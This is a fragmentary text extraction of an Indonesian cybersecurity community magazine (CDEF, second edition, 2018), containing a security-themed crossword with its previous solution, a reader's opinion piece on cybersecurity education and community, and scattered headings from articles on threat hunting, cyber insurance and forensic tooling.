13. Salah satu fase pada proses nomor 12 yang dilakukan oleh peretas untuk mengirim-
kan program jahat atau malware kepada korbannya
14. Sebuah unit yang bertugas untuk mendeteksi dan merespon terhadap insiden kea-
manan informasi
15. Nama peretas wanita dalam serial televisi Mr. Robot
18. Proses yang memfokuskan aktivitas pada kegiatan yang sifatnya berulang kali, dengan
melakukan pendekatan untuk meng-identifikasi, dan memahami threat actor yang mung-
kin sudah masuk dan berada di dalam infrastruktur anda.
Pertanyaan Menurun
1. Lokasi meetup pertama komunitas Cyber Defense Indonesia
2. Wanita yang berhasil memecahkan kode Enigma bersama Alan Turing
3. Salah satu tools Log Management
5. Salah satu fase pada proses nomor 12 yang dilakukan peretas untuk meng-identifikasi
dan menggali informasi lebih terkait target operasinya
6. Nama komputer desktop pertama dari Apple yang juga merupakan nama anak perem-
puan Steve Jobs
11. Elasticsearch, Logstash, Kibana
16. Sistem Operasi yang dibuat secara khusus untuk keperluan analisis malware
17. Organisasi yang membuat framework ATT&CK
Bagi yang berhasil mengisi semua jawaban pada Teka-Teki ini dan mengirimkan
jawaban paling pertama akan mendapatkan hadiah menarik dari Tim Redaksi. Jawa-
ban dapat dikirimkan kepada Tim Redaksi melalui alamat e-mail : redaksi@cdef.id,
paling lambat 14 Mei 2018

SOLUSI #TTS EDISI SEBELUMNYA
a
u
t h r e a t
h a a p t
e n i
n s y s l o g i
t o d e f e n d s
i m p s
c w s n o r t
a a a
t r i a w a r e n e s s
i e x p l o i t o
o s t m
n r e g u l a s i a
c c l
k i
Mendatar
2. Kegiatan yang dimaksudkan untuk melakukan sesuatu yang merugikan 

5. Kegiatan hacking dengan menyusup ke dalam organisasi untuk mengintai, mencuri data
pada organisasi target 
6. Output atau catatan dari sistem operasi 
8. Open source IDS 
9. Penggunaan kerentanan untuk kepentingan penyerang 
11. Peraturan atau perintah (dalam bahasa) 

12. Dimensi penting dalam cybersecurity 
13. Melindungi dari bahaya
Menurun
1. Proses memeriksa kebenaran identitas

3. Serangan siber dengan cara mengenkripsi atau mengunci dan meminta tebusan
4. Perintah di dalam sistem operasi unix
7. Peraturan uni eropa untuk melindungi data individu
10. Protokol untuk mengamankan pertukaran data
12. Tindakan agresif terhadap obyek
16. Ketidaknormalan (dalam bahasa)
 
Kami memohon maaf atas kesalahan pada TTS Edisi pertama

1. kesalahan pada kolom 16 menurun, seharusnya 7 kotak, bukan 8 kotak
2. kesalahan pada kode pertanyaan 6 menurun seharusnya 12 menurun
125
OPINI PEMBACA
ditulis oleh Arin, Datacomm
Dalam menyambut serangan dalam dunia cyber yang semakin banyak dan ganas, diperlu-
kan adanya SDM yang mumpuni dalam bidang tersebut. Semoga kedepannya dunia pen-
didikan menyadari dan mengembangkan kurikulum keilmuannya terutama dalam dunia
cyber security. Beberapa SMK swasta di Indonesia telah memulai perubahan kurikulum
dengan menambahkan kurikulum mengenai pertahanan dalam dunia cyber. Hal ini sangat
menggembirakan karena semakin berkembangnya pengetahuan ini dimulai pada jenjang
pendidikan menengah. Pengetahuan tersebut akan menjadi bekal bagi fresh graduate
dan memudahkannya saat akan berkarir dalam bidang cyber security.
Saat ini juga sudah banyak perusahaan di Indonesia yang menyadari pentingnya per-
lindungan dalam bidang cyber. Baik sebagai pemberi jasanya maupun pengguna
jasanya. Semoga kedepannya tetap ada dan semakin berkembangnya fasilitas serta karir
pada bidang ini di Indonesia. Selain terbukanya lapangan pekerjaan, kecanggihan
teknologi yang semakin berkembang akan dimanfaatkan oleh aktor jahat dalam meraih ke-
untungan. Sehingga karir dalam bidang cyber masih diperlukan.
Tidak sedikit penuntut ilmu yang ingin mempelajari cyber security maupun ingin berkarir
dalam bidang tersebut. Namun, tidak sedikit kurikulum pendidikan yang tidak
menyediakan pembelajaran tersebut atau tidak sesuai dengan jurusan pendidikannya. Be-
runtungnya, terdapat komunitas pecinta cyber defense yang terbentuk, meski tidak se-
dikit juga yang timbul lalu tenggelam. Semoga kedepannya komunitas cyber semakin
berkembang, seperti adanya komunitas Cyber Defense (CDEF) di Indonesia.
126
Komunitas CDEF ini berisi para ahli cyber security, tetapi memberikan kesempatan bagi
pemula dalam dunia cyber untuk menambah wawasan dan informasi dalam dunia cyber
security. Anggota komunitasnya sangat terbuka dalam berbagi ilmu maupun wawasan-
nya, dalam artian tidak pelit ilmu. Kerap kali, dalam komunitas ini juga berdiskusi menge-
nai isu-isu cyber security terkini. Selain pembahasan dalam grup, menariknya komunitas
ini mengadakan comunity meetup tiga bulan sekali yang dihadiri oleh anggotanya mau-
pun orang umum, untuk mengadakan diskusi secara tatap muka. Semoga komunitas ini
terus berkembang dan menginspirasi para penuntut ilmu di Indonesia.
TERIMA KASIH PARA PEMBACA BULLETIN CDEF
© Hak Cipta dilindungi oleh Teman-Teman Komunitas CDEF
Silahkan menyebar luaskan majalah ini, majalah ini adalah majalah gratis atau tidak ber-
bayar. Pungutan yang berkaitan dengan majalah ini di luar tanggung jawab kami. Silahkan
kutip konten majalah ini, tapi mohon tetap sertakan nama asli penulisnya sebagai bentuk
penghargaan dan kerja keras penulis dalam membuat tulisan atau artikel tersebut.
cxxviii

CDEF Magazine Edisi Ke 2

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

CDEF Magazine Edisi Ke 2

Diunggah oleh

Hak Cipta:

Format Tersedia

Edisi Kedua | Edisi Khusus

BERKENALAN DENGAN SRIKANDI

Tim Redaksi Salam Komunitas Cyber Defense Indonesia !!

Tak lupa kami mengucapkan terima kasih kepada para kon-

Kami sadar betul bahwa kontinuitas rilis majalah juga membu-

THREAT HUNTING 101 - PART 2 18

LINDUNGI PASSWORD ANDA UNTUK

KELALAIAN MENGGANTI PASSWORD E-MAIL

CREATE YOUR OWN WAF WITH

MITIGASI SPECTRE & MELTDOWN

LEBIH DEKAT DENGAN SALAH SATU SRIKANDI

LEBIH DEKAT DENGAN ELISABETH ‘IBETH’

DATAFOCUS 2018 INDONESIA 111

EFFECTIVE THREAT INTELLIGENCE –

Latar Belakang melakukan investasi keamanan cyber un-

Cyber Defense Community | Q2 2018 7

Sebagai tanggapan dari risiko yang se- 1. Bagaimanakah proses manajemen

Cyber Defense Community | Q2 2018 8

pat meningkatkan at- yang terkait dengan keamanan cyber atau

Pertumbuhan Pasar Cyber

Cyber Defense Community | Q2 2018 9

2. Penggunaan data yang masif. Pen-

3. Kerentanan pada pihak ketiga. Se-

Penggerak Pasar Cyber Insurance 4. Implikasi regulasi. Adanya kewajiban

Cyber Defense Community | Q2 2018 10

Insurance privasi. Misalnya, pengeluaran terkait

Cyber Defense Community | Q2 2018 11

Cyber Defense Community | Q2 2018 12

Cyber Defense Community | Q2 2018 13

manan informasi yang diadopsi dan informasi tentang manajemen keamanan

Cyber Defense Community | Q2 2018 14

Cyber Defense Community | Q2 2018 15

(8) United States: A Buyer’s Guide To Cyber Insur-

Cyber Defense Community | Q2 2018 16

(12) Cyber Insurance: Recent Advances, Good Prac-

ERYK BUDI PRATAMA

Eryk Budi Pratama atau yang sering disapa Eryk,

Cyber Defense Community | Q2 2018 17

Recap Threat Hunting 101 Part 1 mengimplementasikan Threat hunting?

Cyber Defense Community | Q2 2018 18

Beberapa elemen pendukung di atas akan

Cyber Defense Community | Q2 2018 19

Gambar 1 : Threat Hunting Maturity Model

HM1 (Hunting Maturity 1) – Minimal kita ketahui bersama bahwasannya

Cyber Defense Community | Q2 2018 20

Cyber Defense Community | Q2 2018 21

Cyber Defense Community | Q2 2018 22

Cyber Defense Community | Q2 2018 23

Cyber Defense Community | Q2 2018 24

Cyber Defense Community | Q2 2018 25

Cyber Defense Community | Q2 2018 26

Digit Oktavianto, atau yang sering disapa

Cyber Security Operation Center, Threat

Cyber Defense Community | Q2 2018 28

Cyber Defense Community | Q2 2018 29

Cyber Defense Community | Q2 2018 30

Langkah ini wajib dilakukan sebagai lang-

Selalu ada cara untuk mengamankan data

Cyber Defense Community | Q2 2018 31

Cyber Defense Community | Q2 2018 32

Gambar 1 - Data Backup Whatsapp yang tersimpan di dalam Google Drive

Cyber Defense Community | Q2 2018 33

Proses Instalasi Whapa

git clone https://github.com/B16f00t/whapa.git

Tim Redaksi  Salam Komunitas Cyber Defense Indonesia !!

Mari kita test dengan memasukkan string  